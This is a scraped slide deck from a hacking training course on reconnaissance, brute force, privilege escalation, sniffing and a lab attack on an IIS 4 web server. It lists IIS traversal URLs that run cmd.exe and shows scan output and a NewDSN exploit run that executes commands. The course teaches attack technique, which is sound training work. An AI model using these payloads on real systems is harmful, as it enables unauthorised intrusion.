Survey
* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project
* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project
Parallel port wikipedia , lookup
Computer security wikipedia , lookup
Zero-configuration networking wikipedia , lookup
Buffer overflow protection wikipedia , lookup
Remote Desktop Services wikipedia , lookup
Buffer overflow wikipedia , lookup
Cross-site scripting wikipedia , lookup
System Hacking Section 4 5/25/2017 Outline • • • • • • Service identification Vulnerability identification and research Exploits Putting it all together Target selection in large networks Using automated tools 5/25/2017 Service Identification Section 4.1 5/25/2017 Service Identification • Common ports • Banners • Fingerprinting 5/25/2017 Connecting to ports • Telnet or netcat is the best way to connect to ports • Many services may be accessed directly 5/25/2017 Common ports Many services can be identified by their common port numbers 5/25/2017 Zone-h.org 5/25/2017 Alldas.de 5/25/2017 Banners Some services may be better identified by banners: • telnet on routers (2001, 4001, 6001) • Web daemons for applications – Compaq Insight Manager – Many systems include web configuration interfaces 5/25/2017 Banners 5/25/2017 Fingerprinting Some services cannot be clearly identified just by connecting the them: • Netbus on NT uses the same port as an RPC service on Solaris • Some database connections do not provide automatic response Fingerprinting a service may identify what it is, even if it has moved ports 5/25/2017 Fingerprinting 5/25/2017 Vulnerability Research Section 4.2 5/25/2017 Vulnerability identification and research • This is the process of mapping identified security attributes of a system or application to potential vulnerabilities Several methods to map vulnerabilities: 1. Manually map identified systems against publicly available database such as www.securityfocus.com, www.cert.org and vendor security alerts 2. Use public exploit code posted to various security mailing lists, hacker websites or write your own code 3. Use automated vulnerability scanning tools such as Nessus, ISS or whisker 5/25/2017 Vulnerability research 5/25/2017 Lab • Explore the following security sites to identify what vulnerability information would be of use to you for the services you have identified. – – – – – www.securityfocus.com General searches on google.com www.packetstormsecurity.com www.astalavista.box.sk www.securiteam.com Time: 30 minutes 5/25/2017 Exploits Section 4.3 5/25/2017 Types of exploits • Remote exploits • Trojans • Privilege escalation 5/25/2017 Remote Exploits Section 4.3.1 5/25/2017 Remote exploits A ‘remote exploit’ attempts to gain access across the network and without proper authentication. Examples: • Brute force authentication attempts • Attacks bypassing integrity checkers • Buffer overflows • Sniffing (to some extent) 5/25/2017 Brute force attacks Most common services attacked 1. Telnet 2. FTP 3. “R” commands 4. Secure Shell 5. SNMP community names 6. Post Office Protocol (POP) 7. HyperText Transport Protocol (HTTP/HTTPS) 8. SMB 5/25/2017 Common Tools used • • • • • • Brutus Admsnmp Admsmb TeeNet Pwscan.pl Thc_hydra 5/25/2017 Remote password guessing • Attempting to connect to an enumerated share such as (ADMIN$ and C$) and trying username/password combinations until one works • A “null session” can be established with the target to obtain valid account names • Use an automated password guessing tool to brute force the selected shares. 5/25/2017 Brute force attacks under Windows • Some common services prone to bruteforce: – Web – Netbios – FTP 5/25/2017 5/25/2017 Legion 5/25/2017 Brute force attacks under Unix • Some common services prone to bruteforce: – – – – – telnet Ssh Web FTP R-commands 5/25/2017 Lab • Use a Netbios scanning tool to identify local shares on this network • Use brute force tool to attempt access to an account on 10.0.1.120 • Warning! These tools can produce significant traffic and lock accounts. Time: 30 minutes 5/25/2017 Buffer overflow attacks FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE • • • • Stack overflows Format string overflows Heap overflows Overflow subverting the control path 5/25/2017 Buffer overflow attacks FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE 5/25/2017 Buffer overflow attacks FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE • Occurs when a user or process attempts to place more data into a buffer than was originally allocated • Commonly associated with C functions like strcpy(), strcat(), sprintf() and etc • Most frequently found when user input is taken and passed into an application 5/25/2017 Windows buffer overflows • Only a few conditions have been revealed to date • All of them exploited flaws in application programs • Very common for DoS attacks Exploits 1. Netmeeting 2.x by Cult of the Dead Cow 2. NT RAS by Cerberus Information Security 3. Winhlp32 by Cerberus Information Security 4. IISHack by eEye 5. Oracle Web Listener 4.0 by CIS 6. Outlook GMT token overrun by Underground Security Systems Research 7. IIS .printer 5/25/2017 Unix buffer overflows • • • • Sadmind ftp Ssh nfs 5/25/2017 Unexpected input • Bypassing integrity checks • Gaining access by providing unexpected input – IIS unicode – Web applications 5/25/2017 Format string attacks • Caused by programming errors in the formatted output family of functions, which includes printf() and sprintf() • Efforts usually focused on SUID root programs 5/25/2017 Input validation attacks • Occurs when a program fails to recognise syntactically incorrect input • Occurs when a module accepts extraneous input • Occurs when a module fails to handle missing input fields • A field-value correlation error occurs • Common in web applications 5/25/2017 IIS vulnerabilities • Unicode and URL based attacks • Special tags in HTTP • Sample scripts to brute force 5/25/2017 IIS hacking • • • • • • • • • • • • • • • • /scripts/root.exe?/c+dir /MSADC/root.exe?/c+dir /c/winnt/system32/cmd.exe?/c+dir /d/winnt/system32/cmd.exe?/c+dir /scripts/..%255c../winnt/system32/cmd.exe?/c+dir /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system 32/cmd.exe?/c+dir /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir /scripts/..%252f../winnt/system32/cmd.exe?/c+dir 5/25/2017 Lab • Use the provided URLs to roam the filesystem of 10.0.1.120 • What is accessible and what is not? Time: 10 minutes 5/25/2017 Trojan Horses and Backdoors Section 4.3.2 5/25/2017 Windows trojans and backdoors These programs provide unauthorised access to a system without the user’s knowledge: • Theef • CDC BackOrifice • SubSeven • Moosucker A great site: http://www.tlsecurity.net 5/25/2017 Tlsecurity.net 5/25/2017 Privilege Escalation Section 4.3.3 5/25/2017 Privilege escalation • Attack used to move from normal user to superuser • Quest for Administrator • Quest for root 5/25/2017 Quest for Administrator • • • • Hoovering information Getadmin Sechole Spoofing LPC Port requests 5/25/2017 Hoovering information • Identify further information that will gain higher privileges • Srvinfo • Find utility • regdmp 5/25/2017 Getadmin • Windows NT 4 • Small program written by Konstantin Sobolev • Adds users to the local admin group • Hijacks a process called winlogon • Patched by NT SP3 5/25/2017 Sechole • Similar functionality to getadmin • Modifies instructions in the memory of the OpenProcess API • Possible to launch remotely if IIS is running • Patched by NT SP6a 5/25/2017 Spoofing LPC Port Requests • Vulnerability identified by The RAZOR Team at http://razor.bindview.com • The code takes advantage of a flaw in one function of the Local Procedure Call (LPC) Ports API 5/25/2017 Quest for root • • • • • • • • • Local buffer overflow Symlink File Descriptor attacks Signal handling Core-file manipulation Shared libraries Kernel flaws System misconfiguration IFS attacks 5/25/2017 Local buffer overflow • Mostly used to exploit SUID root programs • May add username to password file 5/25/2017 Sniffing Section 4.3.4 5/25/2017 Sniffing • Sniffing works by setting a network card to ‘promiscuous mode’ • Sniffing only works on traffic travelling across the local network • Sniffing is greatly complicated by network switchs 5/25/2017 Windows password sniffing • Can use any ordinary packet analyser • Or use a specialised tool such as l0phtcrack • Some susceptible services: – Netbios – FTP – Web (especially cookies) 5/25/2017 Windows password sniffing 5/25/2017 Unix password sniffing • Can use any ordinary packet analyser • But Unix has some great sniffers such as dsniff • Many Unix programs send passwords in clear text • Some susceptible services: – Telnet – FTP – Web 5/25/2017 dsniff • • • • • • • Netbios ftp telnet R-commands http Instant messenging And much much more! 5/25/2017 NT services Section 4.4 5/25/2017 Common NT services 5/25/2017 Profile: Netbios • • • • • Ports 135:139 Susceptible to sniffing, brute force Scanners available to search for shares Can give access to system registry Normally blocked at routers due to broadcast 5/25/2017 Profile: Web • Port: 80, or any for special apps • Common servers: Apache, Oracle, IIS, Cold Fusion • Very susceptible to DoS attacks • Often give read access to all files • IIS vulnerabilities are legendary 5/25/2017 Profile: SMTP • Port: 25 • Very susceptible to mail relay • Not a lot else 5/25/2017 Profile: FTP • Port:21 • Part of IIS distribution • Some vulnerabilities but not a large target 5/25/2017 Profile: databases • Ports: 1433, 1510, 1725 • MSSql is a good internal network target • MS and Oracle often set with default passwords • “SQL injection” a favourite for web hackers 5/25/2017 Unix services Section 4.5 5/25/2017 Profile: SNMP • Port: 160, 161 UDP • SNMP has two default passwords: public, private • Tools such as snmpwalk good for enumerating entries 5/25/2017 Profile: TFTP • Port: 69 • Typically used to boot diskless workstations or network devices such as routers • No username or password • Good for sending around files from hacked systems 5/25/2017 Profile: FTP • Ports: 20, 21 • Allows upload and download of files from a remote system • Many ftp server allow anonymous access • May be vulnerable to buffer overflow • Can also be used for bounce attacks 5/25/2017 Profile: Sendmail • Port: 25 • Mail transfer agent used on many Unix systems • Can be used to identify accounts via the vrfy and expn commands • Some version susceptible to denial of service and buffer overflows • Long list of vulnerabilities 5/25/2017 Profile: RPC • Remote Procedure Call • Allow a program on one computer to execute code on a remote system 5/25/2017 Profile: Web • • • • Port: 80 Apache is most common Not as many attacks as IIS Always check URLs for embedded commands 5/25/2017 Identifying targets in large networks Section 4.6 5/25/2017 Target selection • Scan for specific services – – – – Database (MS, Oracle, Sybase) Web RPC R-commands • View Netbios browse lists to make way to PDC/server • View Netbios browse lists to identify treasury, etc 5/25/2017 Automated vulnerability scanning tools Section 4.8 5/25/2017 Example automated applications • • • • • • Grinder SiteScan Whisker Twwscan Nessus Elza – scriptable web client 5/25/2017 whisker 5/25/2017 Nessus 5/25/2017 Conclusion • Hackers often search for specific known vulnerabilities and avoid well-secured systems • Free tools make it simple to gain unauthorised access to some systems • Tools such as Nessus should be used by every security professional 5/25/2017 Putting it all together Section 4.7 5/25/2017 Our Configuration for today For the purpose of the presentation, we will not perform our tests over the internet But we won’t cheat by cutting out the firewall Webserver Internal=10.0.1.120 TCP 80 only External=10.0.0.120 Internet 10.0.0.1 Router Firewall 10.0.0.125 10.0.1.125 5/25/2017 Network Penetration Tests 5/25/2017 Identifying firewall Strategy • Identify the Web or Mail server • Get the Next-Hop before this – – – – This will probably be the perimeter router or the firewall Firewall 1 & NetScreen appear as a hop PIX does not appear as a hop (flattens the network) 80% chance that it will be NetScreen, PIX or Firewall 1 • To figure out which – – – – ICMP ( i.e. Address Mask Request – Response headers) Use TCP Stack finger printing Key ports (258, 259 + 263 could be firewall 1) IPSEC BUT luckily these days the tools are pre-written 5/25/2017 Identifying the Firewall Traceroute [root@wireless root]# traceroute 10.0.0.120 traceroute to 10.0.0.120 (10.0.0.120) 30 hops max, 38 byte packetsUDP being blocked Need another tool 1 * * * 2 * * 5/25/2017 Identifying the Firewall - LFT # lft -vv –E -n 10.0.0.120 Looks like we made it. Everyone responded. Will finish TWO TTL Moving on... Suggests Concluding with 2 hops. something between us LFT trace to 10.0.0.120:80/tcp **[4.2 BSD bug]next gateway may errantly reply with reused TTLs A firewall perhaps **[4.2 BSD bug]next gateway may errantly reply with reused TTLs 1 [target] 10.0.0.120:80 6.5ms 2 [target] 10.0.0.120:80 1.6ms Could also use MPTraceroute 5/25/2017 Accessible hosts – sweep for the firewall # nmap -sP -n 10.0.0.* Starting nmap V. 3.00 ( www.insecure.org/nmap/ ) Host Ourup. web server (10.0.0.120) appears to be Host (10.0.0.121) appears to be down. Host Who’s this (10.0.0.122) appears to be down. Host (10.0.0.123) appears to be down. Host (10.0.0.124) appears to be down. Host (10.0.0.125) appears to be up. Host (10.0.0.255) appears to be down. Nmap run completed -- 256 IP addresses (2 hosts up) scanned in 35 seconds 5/25/2017 Identifying the perimeter – Ikescan # ike-scan -v 10.0.0.125 Starting ike-scan 1.6 with 1 hosts --- Pass 1 of 3 completed --- Pass 2 of 3 completed --- Pass 3 of 3 completed Ending ike-scan 1.6: 1 hosts scanned in 22.595 seconds (0.04 hosts/sec). 0 returned handshake; 0 returned notify 5/25/2017 Identifying the Firewall conclusion # ping 10.0.0.120 PING 10.0.0.120 : 56(84) bytes of data. 64 bytes from 10.0.0.120: icmp_seq=1 ttl=128 time=0.280 ms --- 10.0.0.120 ping statistics --2 packets transmitted, 2 received, 0% loss Windows !! # ping -v -R 10.0.0.120 PING 10.0.0.120 : 56(124) bytes of data. --- 10.0.0.120 ping statistics --- With low level Packet inspection 6 packets transmitted, 0 received,100% loss I think not!! 5/25/2017 Identifying the Firewall – Icmp processing # ping -v -T tsandaddr 10.0.0.120 PING 10.0.0.120 (10.0.0.120) from 10.0.0.1 : 56(124) bytes of data. --- 10.0.0.120 ping statistics --16 packets transmitted, 0 received, 100% loss # ping -v -T tsandaddr 10.0.0.125 PING 10.0.0.125 (10.0.0.125) from 10.0.0.1 : 56(124) bytes of data. --- 10.0.0.125 ping statistics --8 packets transmitted, 0 received, 100% loss 5/25/2017 Identifying the Firewall Conclusion • We suspect there is a firewall – We know the web server is windows – But windows is not normally capable of manipulating packets to this extent – We are fairly sure that it isn’t firewall 1 Lets see if we can hack into the servers 5/25/2017 Hacking the other address 10.0.0.125 5/25/2017 Scanning 10.0.0.125 # nmap -sS -n -p 1-10000 10.0.0.125 Starting nmap 3.48 ( http://www.insecure.org/nmap/ ) All 10000 scanned ports on 10.0.0.125 are: filtered Nmap run completed -- 1 IP address (1 host up) Nothing to hack # nmap -sU -n -p 1-10000 10.0.0.125 Starting nmap 3.48 ( http://www.insecure.org/nmap/ ) All 10000 scanned ports on 10.0.0.125 are: filtered Nmap run completed -- 1 IP address (1 host up) 5/25/2017 Hacking the web server 5/25/2017 Hacking the web server – Scan TCP ports – Scan UDP ports !!! Only HTTP or HTTPS ports should be visible – Run CGI scanner (I.e. Whisker, Crazymad or Nikto) to look for web server exploits – Check Scanner – Identify exploits 5/25/2017 Hacking the web server Scan UDP ports # # nmap -sU -n -p 1-10000 10.0.0.120 Nothing to hack Starting nmap 3.48 All 10000 scanned ports on 10.0.0.120 are: filtered Nmap run completed -- 1 IP address (1 host up) scanned in 623.296 seconds # # # 5/25/2017 Hacking the web server Scan TCP ports # nmap -sS -n -O -p 1-1024 10.0.0.120 HTTP - The only Interesting ports on 10.0.0.120: Port to hack (The 1023 ports scanned but are filtered) PORT STATE SERVICE 80/tcp open http Now we know Running (JUST GUESSING) : Cisco pix os 6.X (88%) Aggressive OS guesses: Cisco PIX 501 running 6.x No exact OS matches for host. 5/25/2017 Hacking the web server Run CGI scanner # ./whisker.pl -h 10.0.0.120 -- whisker / v1.4.0 / rain forest puppy – = Host: 10.0.0.120 = Server: Microsoft-IIS/4.0 + 200 OK (IDC error): GET /scripts/samples/details.idc + 200 OK (IDC error): GET /scripts/samples/ctguestb.idc + 200 OK: HEAD /scripts/tools/newdsn.exe - this can be used to make DSNs, useful in use with our ODBC exploit - and the RDS exploit (with msadcs.dll) [root@wireless v1.4]# exit 5/25/2017 Hacking the web server Analysing CGI scanner results 5/25/2017 Hacking the web server Analysing CGI scanner results 5/25/2017 Hacking the web server Analysing CGI scanner results 5/25/2017 Run exploit identified by scanner # dsnhackII.pl -c -h 10.0.0.120 NewDSN exploit v 1.3 -- Scrippie / Phreak.nl * [Checking for necessary files] * Checking for: newdsn.exe -- Found :) Checking for: ctguestb.idc -- Found :) Checking for: details.idc -- Found :) * Now trying to create "Web SQL" DSN... <success> * Initializing GuestBook by GETting ctguestb.idc Type the command line you want to run (cmd /c assumed): cmd /c dir >> ..\hamster * Now trying to execute command... <success> * [root@wireless root]# 5/25/2017 Lab • Attack the systems provided and attempt to get command line access to NT Time: 45 minutes 5/25/2017